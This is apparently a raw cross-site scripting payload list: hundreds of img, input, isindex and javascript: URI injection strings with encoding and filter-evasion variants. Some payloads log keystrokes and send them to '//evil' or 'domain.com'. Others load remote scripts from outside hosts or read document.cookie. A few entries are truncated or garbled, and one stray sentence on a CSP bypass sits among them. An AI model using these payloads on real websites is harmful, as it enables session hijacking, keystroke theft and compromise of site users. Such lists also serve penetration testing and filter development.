- <img/src=x alt=confirm(1) onmouseover=eval(alt)>
- <img src=”x” alt=”’’onmouseover=alert(1)”>
- <img src=”x:gif” onerror=”alert(0)”>
- <img src=”x:gif” onerror=”eval(‘al’%2b’ert(/renwax23/)’)”>
- <img src=”x:gif” onerror=”eval(‘al’%2b’lert(0)’)”>
- <img src=”x:gif” onerror=”window[‘al\u0065rt’]
- <img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
- <img src=”x:gif” onerror=”window[‘al\u0065rt’](0)”></img>
- <img src=”x:gif” onerror=”window[‘al\u0065rt’] (/’renwax23'/)”></img>
- <img/src=”x”/id=”javascript”/name=”:confirm”/alt=”(1)”/onerror=”eval(id + name + alt)”>
- <img src=”x:kcf” onerror=”alert(1)”>
- <IMG SRC=x onabort=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onafterprint=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onbeforeprint=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onbeforeunload=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onblur=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncanplay=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncanplaythrough=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onchange=”alert(String.fromCharCode(88,83,83))”>
- <img src=x on*chr*Error=”javascript:log(*num*)”/>
- <IMG SRC=x onclick=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncontextmenu=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncopy=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncuechange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oncut=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondblclick=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondrag=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragend=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragenter=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragleave=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragover=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondragstart=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondrop=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ondurationchange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onemptied=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onended=”alert(String.fromCharCode(88,83,83))”>
- <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
- <img src=x onerror=”javascript:alert('XSS')">
- <img src=x onerror=document.body.appendChild(createElement('script')).src='http://xss8.net/? c=QihaL'>
- <IMG SRC=”/x” onerror=”  javascript:alert(‘XSS’);”>
- >’>”><img src=x onerror=alert(0)>
- “><img src=x onerror=alert(0)>
- <img src=x onerror=”alert(1)”
- <img/src==”x onerror=alert(1)//”>
- <img src=x onerror=alert(123) />
- />.<<img src=x onerror=alert(1)//>><>&page=1
- <img/src=’x’onerror=alert(1)>//INJECTX
- <img src=x onerror=alert(24)> 29
- “><img src=x onerror=’alert(document.domain)’>
- <img src=x onerror=alert(/insight-labs/)>B<p
- <img src=x onerror=alert(String.fromCharCode(88,83,83));>
- “><img src=x onerror=alert(String.fromCharCode(88,83,83));>
- <IMG SRC=x onerror=”alert(String.fromCharCode(88,83,83))”>
- <img src=x onerror=alert(‘XSS’);>
- “><img src=x onerror=alert(‘XSS’);>
- “><img src=x onerror=’alert(xzz)’>
- <img src=x onerror=appendChild(createElement(‘script’)).src=’//jsa}’ />
- <img/src=”x”/onerror=”[boom]”>
- ><img src=\”x\” onerror=\”confirm(0)\”/>
- “\”><img src=\”x\” onerror=\”confirm(0)\”/>”,
- “><img src=x onerror=confirm(1); …
- @”><img src=x/onerror=confirm(1)>xss
- <img src=x onerror=’confirm(domain+/ — /+cookie)’>”>
- ><imgsrc=x onerror=confirm.onerror=confirm(1)>
- “\”><imgsrc=x onerror=confirm.onerror=confirm(1)>”,
- “><img src=x onerror=confirm(‘x’) />]
- “><img src=x onerror=confirm`/XSS/`>//
- “><img src=x onerror=co\u006efir\u006d`1`>
- <img src=x onerror=document.body.appendChild(document.createElement(‘script’)).src=’domain.js’>
- <img src=x onerror=”document.location=’http://xss.cx’”;>
- <img src=x onerror=’document.onkeypress=function(e){fetch(“//evil?k=”+String.fromCharCode(e.which))},this.remove();’>
- <img src=x onerror=’document.onkeypress=function(e){fetch(“http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
- <img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,119,47,51,51,56,49,34))>
- <img src=x onerror=eval(String.fromCharCode(document.body.appendChild(createElement(“script”)).src=”http://xss.tw/3381"))>
- <IMG SRC=”/x” onerror=”jav%00ascript:alert(‘XSS’);”>
- “><img src=x onerror=javascript:alert(`1`)>
- “><img src=x onerror=javascript:alert(‘1’)>
- “><img src=x onerror=javascript:alert(“1”)>
- “><img src=x onerror=javascript:alert((`1`))>
- “><img src=x onerror=javascript:alert((‘1’))>
- “><img src=x onerror=javascript:alert((“1”))>
- “><img src=x onerror=javascript:alert(1)>
- “><img src=x onerror=javascript:alert(`A`)>
- “><img src=x onerror=javascript:alert(‘A’)>
- “><img src=x onerror=javascript:alert(“A”)>
- “><img src=x onerror=javascript:alert((`A`))>
- “><img src=x onerror=javascript:alert((‘A’))>
- “><img src=x onerror=javascript:alert((“A”))>
- “><img src=x onerror=javascript:alert((A))>
- “><img src=x onerror=javascript:alert(A)>
- ><IMG SRC=x onerror=javascript:alert("Xss-By-Muhaddi")>
- ><IMG SRC=x onerror=javascript:alert("Xss")>
- ��><IMG SRC=x onerror=javascript:alert("Xss")>
- <IMG SRC=”/x” onerror=”jav ascript:alert(‘XSS’);”>
- <img src=x onerror=”javascript:window.onerror=alert;throw 1">
- <Img src = x onerror = “javascript: window.onerror = alert; throw 1”>
- <Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>
- <IMG SRC=”/x” onerror=”jav
ascript:alert(‘XSS’);”>
- <img/src=”x”/onerror=”[JS-F**K Payload]”>
- ><imgsrc=x onerror=prompt(0);>
- “><img src=x onerror=prompt(0)>
- <img src=x onerror=prompt(1);>
- <img src=x onerror=prompt`1`>
- <img src=x onerror=prompt(1);>
- “><img src=x onerror=prompt(1)>
- “><img src=x onerror=prompt(1);>
- #><img src=x onerror=prompt(1)>
- #��><img src=x onerror=prompt(1)>
- <img src=x onerror=prompt(1)>//INJECTX
- <img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
- “><img src=x onerror=prompt(document.location);>#”><img src=x onerror=prompt(document.location);>
- ‘ “/><img src= x onerror=prompt(/xss/)>
- “><img src=x onerror=prompt(/xss by me/)>
- “><img src=x onerror=prompt(“xss”);>#”><img src=x onerror=prompt(“xss”);>
- <img src=x onerror=URL=’javascript:confirm(1)’>
- <img src=x onerror=window.open(‘data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’);>
- <img src=x onerror=window.open(‘http://google.com');>
- “><img src=x onerror=window.open(‘https://www.google.com/');>
- “><img src=x onerror=window.open(‘https://www.google.com/');>
- <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’”></img>
- <img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’domain.js’” width=”0" height=”0"></img><img src=x onerror=with(document)body.appendChild(document.createElement(‘script’)).src=”domain.js”></img>
- <img src=x onerror=\x00"javascript:alert(1)”>
- <img src=x onerror=\x09"javascript:alert(1)”>
- <img src=x onerror=\x10"javascript:alert(1)”>
- <img src=x onerror=\x11"javascript:alert(1)”>
- <img src=x onerror=\x12"javascript:alert(1)”>
- <img src=x onerror=\x32"javascript:alert(1)”>
- ><IMG SRC=x onerror=javascript:alert('XSS')>
- ��><IMG SRC=x onerror=javascript:alert('XSS')>
- <img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
- ><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>
- “<img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”
- “\”><img src=x onerror=x.onerror=confirm(1);prompt(2);confirm(/XSS/.source);prompt(String.fromCharCode(88,83,83))>”,
- <img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>
- “<img src=x onerror=x.onerror=m=’%22%3E%3Cimg%20src%3Dx%20onerror%3Dx.onerror%3Dprompt%28/xss/.source%29%3E’;d=unescape(m);document.write(d);prompt(String.fromCharCode(88,83,83))>”
- “/><img src=x onerror=x.onerror=prompt(0)>
- “\”/><img src=x onerror=x.onerror=prompt(0)>”
- “/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>
- “\”/><img src=x onerror=x.onerror=prompt(/xss/.source);confirm(0);confirm(1)>”
- <IMG SRC=x onhashchange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oninput=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x oninvalid=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onkeydown=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onkeypress=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onkeyup=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onload=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onloadeddata=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onloadedmetadata=”alert(String.fromCharCode(88,83,83))”>
- <img src=x onload=prompt(1) onerror=alert(1) onmouseover=prompt(1)>
- <IMG SRC=x onloadstart=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmessage=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmousedown=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmousemove=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmouseout=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmouseover=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmouseup=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onmousewheel=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onoffline=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ononline=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpagehide=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpageshow=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpaste=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpause=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onplay=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onplaying=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onpopstate=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onprogress=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onratechange=”alert(String.fromCharCode(88,83,83))”>
- <img src=`x` onrerror= ` ;; alert(1) ` />
- <IMG SRC=x onreset=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onresize=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onscroll=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onsearch=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onseeked=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onseeking=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onselect=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onshow=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onstalled=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onstorage=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onsubmit=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onsuspend=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ontimeupdate=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x ontoggle=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onunload=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onvolumechange=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onwaiting=”alert(String.fromCharCode(88,83,83))”>
- <IMG SRC=x onwheel=”alert(String.fromCharCode(88,83,83))”>
- <img src=”x:o” title=”onerror=alert(1)//”>
- <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
- <img src=”x` `<script>alert(1)</script>”` `>
- <img src=”x` `<script>javascript:alert(1)</script>”` `>
- <img src=xss onerror=alert(1)>
- <img/src=”xss.png”alt=”xss”>
- <img src=”x:? title=” onerror=alert(1)//”>
- <img src=x\x09onerror=”javascript:alert(1)”>
- <img src=x\x10onerror=”javascript:alert(1)”>
- <img src=x\x11onerror=”javascript:alert(1)”>
- <img src=x\x12onerror=”javascript:alert(1)”>
- <img src=x\x13onerror=”javascript:alert(1)”>
- <img src=”xx# onerror=alert(1)//{0xf09d8c86}”>
- <![<img src=x:x onerror=`alert(/ @jackmasa /)//`] →
- “><img src=”x:x” onerror=”alert(XSS)”>
- ‘><img/src=”x:x”/onerror=”confirm(1)”’><
- <![<img src=x:x onerror=`confirm(2)//`] →
- <img src=xx: onerror=confirm(document.location)>
- <img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
- “><img src=”xx:x” alt=”``onerror=confirm(1)”><script>document.body.innerHTML+=’’</script>
- <! — `<img/src=xx:xx onerror=alert(1)// — !>
- <img src=`xx:xx`onerror=alert(1)>
- <img src=`xx:xx`onerror=confirm(1)>
- <img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
- ><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>
- “<img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”
- “\”><img src=`xx:xx` onerror=confirm(/XSS/.source);confirm(1)>”,
- →<! — — -> <img src=xxx:x onerror=javascript:alert(1)> →
- <img src=xx:xx onerror=window[[‘logChr*chr*’]](*num*)>
- `”’><img src=xxx:x onerror\x00=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x09=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0A=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0B=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0C=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x0D=javascript:alert(1)>
- `”’><img src=xxx:x onerror\x20=javascript:alert(1)>
- `”’><img src=xxx:x \x00onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x09onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Aonerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Bonerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Conerror=javascript:alert(1)>
- `”’><img src=xxx:x \x0Donerror=javascript:alert(1)>
- `”’><img src=xxx:x \x20onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x22onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x27onerror=javascript:alert(1)>
- `”’><img src=xxx:x \x2Fonerror=javascript:alert(1)>
- <IMG STYLE=’
- <IMG STYLE_NeatHtmlReplace=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
- <img style=”xss:expression(alert(0))”>
- <Img style = “xss: expression (alert (0))”>
- <IMG STYLE=’xss:expre\ssion(alert(“X5SS”))’>
- <IMG STYLE=”xss: expre\ssion(alert(“XSS”))”>
- <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- <;IMG STYLE=”;xss:expr/*XSS*/ession(alert(‘;XSS’;))”;>;
- <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”>
- <IMG STYLE=”xss:expr/*XSS*/ession(alert(‘XSS’))”
- <IMG STYLE=”xss:expr/*XSS*ession(alert(‘XSS’))”>
- <IMG STYLE=”xss:expr/*XSS*/ession(confirm(document.location))”>
- <img STYLE=”xss:expr/*XSS*/ession(document.vulnerable=true)”>
- <IMG STYLE=”xss:expr/*XSS*/ession(javascript:alert(1))”>
- <img =”=” title=”><img src=1 onerror=alert(1)>”
- <img \x00src=x onerror=”alert(1)”>
- <img \x00src=x onerror=”javascript:alert(1)”>
- <img\x0bsrc=’1'\x0bonerror=alert(0)>
- <;IMG
SRC
=
”;
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

’;
X
S
S
’;
)
”;
>;
- <img\x10src=x onerror=”javascript:alert(1)”>
- <img \x11src=x onerror=”javascript:alert(1)”>
- <img\x11src=x onerror=”javascript:alert(1)”>
- <img \x12src=x onerror=”javascript:alert(1)”>
- <img\x13src=x onerror=”javascript:alert(1)”>
- <img\x32src=x onerror=”javascript:alert(1)”>
- <img \x34src=x onerror=”javascript:alert(1)”>
- <img \x39src=x onerror=”javascript:alert(1)”>
- <img \x47src=x onerror=”javascript:alert(1)”>
- <img\x47src=x onerror=”javascript:alert(1)”>
- <img x/src=x /onerror=”x-\u0063onfirm(1)”>
- import(‘da\r\nta:text/\ecmascript\,alert%601%60’)
- import(‘data:text/javascript,alert(1)’)
- <?import namespace=”t” implementation=”#default#time2">
- <?import namespace=”t” implementation=”#default#time2"><t:set attributeName=”innerHTML” to=”XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>”></BODY></HTML>
- <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc">
- <?import namespace=”xss” implementation=”http://ha.ckers.org/xss.htc">
- @import url(http://attacker.org/malicious.css)
- ‘/(@import)/Usi’,
- ?injection=<script+&injection=>alert(1)></script>
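- Injection with a GIF file as the source of a script (CSP bypass): relevant when script-src trusts an origin that also serves user-uploaded files; serving uploads from a separate origin and sending `X-Content-Type-Options: nosniff` keeps the browser from running image-typed responses as script.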
- innerHTML=document.title
- innerHTML=innerText
- innerHTML=location.hash>#<script>alert(1)</script>
- /><input>
- input1=<script/&in%u2119ut1=>al%u0117rt(‘1’)</script>
- <input autofocus onblur=alert(1)>
- <input autofocus onblur=alert(103)>
- <input/autofocus/onfocus=
- <input autofocus onfocus=alert(1)>
- <input autofocus onfocus=alert(1)>//INJECTX
- <input autofocus onfocus=confirm(1)>
- <input/autofocus/onfocus=setTimeout(URL.slice(-7))//#alert()
- <input formaction=JaVaScript:confirm(document.cookie)>
- Input[hidden] XSS <input type=hidden style=`x:expression(alert(/ @garethheyes /))`> target it.
- <input id=11 name=s value=`aa`onclick=alert(/xss/)>
- <input id=x><input id=x><script>confirm(x)</script>
- <input id=XSS onblur=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus><input autofocus>
- <input id=XSS onfocus=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32)) autofocus>
- <input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
- <input name=password value=logic>
- <input name=USERNAME_PARAMETER_NAME value=USERNAME>
- <input name=username value=brute>
- <input onblur=alert(34) autofocus><input autofocus>
- <input onblur=javascript:alert(1) autofocus><input autofocus>
- <input onblur=write(XSS) autofocus><input autofocus>
- <input onclick=popup=1; >
- <input onfocus=alert(1337) </autofocus>
- <input onfocus=”alert(1)” autofocus>
- <input onfocus=alert(33) autofocus>
- <><input onfocus=confirm(0) autofocus <! —
- <input onfocus=javascript:alert(1) autofocus>
- <input onfocus=popup=1; autofocus=”x”>
- <InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>renwa
- <input onfocus=write(1) autofocus>
- <input onfocus=write(XSS) autofocus>
- <input/onmouseover=”javaSCRIPT:confirm(1)”
- <input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaa!>
- <INPUT SRC=”javascript:alert(‘XSS’);”>
- <input srcset=x href=x onclick=popup=1; >
- <input style=”behavior: url(xss.txt)”>
- </input/><svg><script>alert(1)//
- </input/”><svg><script>alert(1)//
- <INPUT TYPE=”BUTTON” action=”alert(‘XSS’)”/>
- <INPUT+TYPE=”checkbox”+onDblClick=confirm(XSS)>
- <input type=hidden name=comment>click me!</form>
- <input type=hidden onformchange=confirm(1)/>
- <input type=hidden style=`x:expression(confirm(1))`>
- <input type=hidden style=`x:expression(confirm(4))`>
- <input type=”image” dynid=XSS SRC=”javascript:alert(‘XSS’);”>
- <INPUT TYPE=”image” DYNSRC=”javascript:alert(‘XSS’);”>
- <input type=”image” dynsrc=”javascript:document.vulnerable=true;”>
- <input type=”image” formaction=JaVaScript:alert(0)>
- <Input type = “image” formaction = JaVaScript: alert (0)>
- <INPUT TYPE=”IMAGE” id=XSS SRC=”javascript:alert(‘XSS’);”>
- <INPUT+TYPE=”IMAGE”+SRC=”javascript:alert(1);”>
- <;INPUT TYPE=”;IMAGE”; SRC=”;javascript:alert(‘;XSS’;);”;>;
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
- <INPUT TYPE=”IMAGE” SRC=”javascript:alert(XSS);”>
- <INPUT TYPE=IMAGE SRC=javascript:alert(XSS);>
- <INPUT TYPE=”IMAGE” SRC=”javascript:confirm(document.location);”>
- <input TYPE=”IMAGE” SRC=”javascript:document.vulnerable=true;”>
- <INPUT TYPE=”IMAGE” SRC=”javascript:javascript:alert(1);”>
- <input/type=”image”/value=””`<span/onmouseover=’confirm(1)’>X`</span>
- <input type=”search” onsearch=”aler\u0074(1)”>
- <input type=”text” name=”a”
- <input type=”text” name=”foo” value=””autofocus/onfocus=alert(1)//”>
- <input type=”text” name=”text”> <input type=”submit” onclick=”waf”>
- <input type=”text” value=``<div/onmouseover=’alert(1)’>X</div>
- <input type=”text” value=`` <div/onmouseover=’alert(1)’>X</div>
- <input type=”text” value=``<div/onmouseover=’confirm(1)’>X</div>
- <input type=”text” value=`` <div/onmouseover=’confirm(1)’>X</div>
- <input type=’text’ value=’jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’></input>
- <input type=”text” value=”jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”></input>
- <input type=text value=jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
- <input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21ha W4p`”/>
- <input type=”text”value=””onclick=”location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`”/>
- <input type=”text” value=””onfocus=location=’javascript:alert`1`’ autofocus””/>
- <input type=”text” value=””onresize=pompt(1) “>
- <input type=”text” value=””onresize=pompt(1) “> // IE 10 docmode
- <input type=”text” value=””><script>alert(1)//”><script type=”text/javascript”> function x(){ do something }</script>
- <input value:aa/onclick=alert(/xss/)>
- <input value=”${alert(1)}`</script/”>
- <! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
- <! — — !><input value=” →<body/onload=`alert(/ @jackmasa /)//`”>
- <! — — !><input value=” →<body/onload=`confirm(4)//`”>
- <input value=<><iframe/src=javascript:confirm(1)
- “><input value=<><iframe/src=javascript:confirm(1)
- <input value=”INPUT”>
- <input value=INPUT>
- <input value=””onfocus=alert(9)//”>
- <input value=’’onfocus=alert(9);a=’’>
- <input value=”<script>alert(1)</script>” `/>
- <input value=”><script src=data:%26comma;alert(1)-”>
- <input value=””><script src=data:%26comma;alert(1)-””>
- <input value=”XSStest” type=text>
- <Input value = “XSS” type = text>
- <i onclick=alert(1)>Click here</i>
- <i/onclick=URL=name>
- io.swf?yid=\”));}catch(e){alert(1);}//
- (?i)([\s\”’`;\/0–9\=]+on\w+\s*=)
- i><<script>alert(document.cookie);//<</script>
- i><ScRiPt>alert(document.cookie)</script>
- i.setAttribute(name, follow);
- i.setAttribute(type, hidden);
- ( is html encoded to (
- ) is html encoded to )
- i><si%2bicript>alert(document.cookie)</script>
- <isindex action=data:text/html, type=image>
- <isindex action=javascript:alert(166) type=submit value=click>
- <isindex action=”javascript:alert(1)” type=image>
- <isindex action=javascript:alert(1) type=image>
- <isindex action=”javascript:alert(1)” type=image> // Firefox, IE
- <isindex action=javascript:alert(1) type=submit value=click> *
- <isindex action=javascript:alert(1) type=submit value=click>
- <isindex action=javascript:alert(1) type=submit value=click>
- <isindex action=javascript:alert(32) type=image>
- <isindex action=”javas&tab;cript:alert(1)” type=image>
- <isindex action=”javas	cript:alert(1)” type=image>
- <isindex action=”javas	cript:confirm(1)” type=image>
- “><isindex action=”javas	cript:confirm(1)” type=image>
- “/><isindex action=”javas	cript:confirm(1)” type=image>
- <isindex action=”javas	cript:confirm(document.cookie)” type=image>
- <isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
- <isindex action=j	a	vas	c	r	ipt:alert(1) type=image> Google Chrome, IE
- <isindex/**/alt=1+src=renwa:window[‘alert’]/**/(alt)+type=image+onerror=while(true){eval(src)}>
- <isindex/autofocus/onfocus=alert()>
- <isindex formaction=javascript:alert(171) type=submit value=click>
- <isindexformaction=”javascript:alert(1)” type=image>
- <isindexformaction=”javascript:alert(1)” type=image>
- <Isindexformaction = “javascript: alert (1)” type = image>
- <isindex formaction=javascript:alert(1) type=submit value=click> *
- <isindex formaction=javascript:alert(1) type=submit value=click>
- <isindex formaction=javascript:alert(1) type=submit value=click>
- <isindex formaction=javascript:confirm(1)>
- <isindex type=image src=1 onerror=alert(1)>
- <isindex+type=image+src=1+onerror=alert(1)>
- <isindex type=image src=1 onerror=alert(31)>
- <isindex type=image src=1 onerror=alert(XSS)>
- <isindex x=”javascript:” onmouseover=”alert(1)” label=”test”>
- <isindex x=”javascript:” onmouseover=”alert(1)” label=”test”> // Firefox, IE
- <isindex x=”javascript:” onmouseover=”alert(XSS)”>
- i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\’a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\’\s\rc\=\’eeeeeee\’\20\>{
- <i style=x:expression(alert(URL=1))>
- <i/style=x=x/**/(confirm(1))(‘\’)expression\’)>
- <i/style=x=x/**/n(confirm(1))(‘\’)expressio\’)>
- <i\x00mg src=’1' onerror=alert(0) />
- <j 1=”*/””-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
- <j 1=*/-alert(1)<!V onclick=location=innerHTML%2bouterHTML>javascript:/*click me!
- */<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j 1=-alert(9)// onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j 1=-alert(9)// onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
- <j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
- */<j-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j”-alert(1)<!V onclick=location=innerHTML%2bpreviousSibling.nodeValue%2bouterHTML>javascript:/*click me!
- */”<j”-alert(9)<! — onclick=location=innerHTML+previousSibling.nodeValue+outerHTML>javascript:/*click me!
- javascript:name
- java%09script:alert(1)
- java%0ascript:alert(1)
- java%0dscript:alert(1)
- Javas%26%2399;ript:alert(1)
- javascript:alert(1)
- Javascript:alert(1)
- javascr%0d%0aipt%3Aalert.call(this,%20document.domain)
- javascript:/* —
- javascript:([,?,,,,?]=[]+{},[?,?,?,?,,?,?,?,,,?]=[!!?]+!?+?.?)[?=?+?+?+?+?+?+?+?+?+?+?][?](?+?+?+?+?+’(-~?)’)()
- javascript & # 00058; alert (1)
- javascript:confirm(1)
- jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
- javascript:alert(1)
- javascript	:alert(1)
- javascript://%0Aalert(1)
- javascript://%0aalert(1) or javascript://%250aalert(1)
- javascript:1/*click me!*/ + <alert(1)<! — K </alert(1)<! — →
- javascript:1/*click me!*/ + <alert(1)<!V onclick=location=innerHTML%2bouterHTML>
- javascript://%250Aalert(document.cookie)
- javascript://%250Aalert(document.location=”https://google.com",document.location="https://www.facebook.com")
- javascript:’\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
- “javascript:alert(0)”></param></object>
- ?javascript:alert(1)”,
- javas + cript: + -alert(1)
- javas + cript: + ale + rt + ( + 1 + )
- javas + cript: + ale + rt + (1)
- javas + cript:” + “-alert(1)
- javascrip + t:alert(1)
